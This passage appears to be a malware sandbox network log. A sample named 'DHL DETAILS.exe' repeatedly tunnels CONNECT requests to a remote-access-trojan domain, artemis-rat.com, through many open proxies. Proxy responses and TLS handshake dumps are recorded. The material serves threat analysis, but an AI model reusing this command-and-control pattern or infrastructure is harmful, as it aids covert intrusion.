Mar 9, 2024 13:14:21.833607912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.833117962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
867	192.168.2.5	52739	219.243.212.118	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.663619995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.991122007 CET	22	IN	HTTP/1.1 502 ERROR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
868	192.168.2.5	52753	13.229.47.109	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.664045095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.996867895 CET	224	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:11:46 GMT Content-Type: text/plain; charset=utf-8 Connection: close Content-Length: 12 X-Kong-Response-Latency: -8.7738037109375e-05 Server: kong/2.8.1 Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a Data Ascii: Bad request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
869	192.168.2.5	52764	8.213.128.90	7777	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.664588928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.380332947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.472551107 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
870	192.168.2.5	52450	120.194.4.157	82	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.668607950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.320009947 CET	319	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 170 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
871	192.168.2.5	50238	51.75.126.150	35632	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.669250965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
872	192.168.2.5	52770	185.81.153.162	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.670523882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
873	192.168.2.5	52780	202.83.102.83	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.670576096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
874	192.168.2.5	51732	51.158.111.76	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.675033092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.723902941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833600044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
875	192.168.2.5	52756	203.171.19.98	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.679020882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536411047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.899497986 CET	7	IN	Data Raw: 15 03 03 00 02 02 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
876	192.168.2.5	51802	162.241.50.179	34099	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.680318117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.677071095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.736808062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
877	192.168.2.5	52813	121.164.200.18	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.680324078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.536253929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
878	192.168.2.5	52747	65.1.244.232	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.707948923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.103594065 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
879	192.168.2.5	52907	104.16.106.234	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.716061115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.870562077 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
880	192.168.2.5	52862	3.12.144.146	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.718252897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.935096979 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
881	192.168.2.5	52799	47.96.145.14	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.718519926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.075413942 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
882	192.168.2.5	51883	157.230.33.25	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.723181963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.067135096 CET	19	IN	HTTP/1.0 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
883	192.168.2.5	52839	54.248.238.110	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.724337101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.995163918 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:15 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:16.037009001 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 96 95 47 8e d4 17 e9 8f 06 9e 94 46 de 2b 4e bc 98 b2 ba d4 66 3a 49 5b 3a 5e cb 76 6b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRGF+Nf:I[:^vk*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:16.307312965 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 d4 61 42 e0 f6 4b c1 8c 11 8f 37 d0 c8 84 75 b3 fb 74 89 cb e9 6f 5f 91 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9aBK7uto_DOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa
Mar 9, 2024 13:14:16.345767975 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 95 73 83 4e 0d 22 6d e4 54 08 38 c3 33 04 a6 c0 e5 0e 83 39 dd b0 5d 8b 51 5c e2 5f 67 2b dd 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b9 c9 62 96 3c 2a 06 b6 a8 f9 4a d4 96 4e 9f e3 52 c2 50 d0 43 Data Ascii: %! sN"mT839]Q\_g+P(b<*JNRPCTXJ
Mar 9, 2024 13:14:16.614114046 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 50 1c 06 3b b3 6d 47 81 1b 75 0a 0e 62 7a f7 8e 90 da c7 32 15 5e 06 f1 ee fb 8c 83 50 85 a8 f4 17 2f e5 15 50 bd a3 39 Data Ascii: (P;mGubz2^P/P9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
884	192.168.2.5	50203	37.32.98.160	38440	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.739391088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.833159924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833997011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.833096027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
885	192.168.2.5	52829	43.128.107.251	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.755089998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.112476110 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
886	192.168.2.5	52857	72.210.221.223	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.758192062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
887	192.168.2.5	52865	192.252.216.81	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.760265112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
888	192.168.2.5	52968	104.23.126.8	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.761841059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.916276932 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
889	192.168.2.5	52738	146.190.85.79	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:15.765194893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.265734911 CET	536	IN	HTTP/1.1 503 Service Unavailable Server: squid/4.6 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3773 X-Squid-Error: ERR_DNS_FAIL 0 Vary: Accept-Language Content-Language: en Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
890	192.168.2.5	51748	128.199.165.63	33574	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
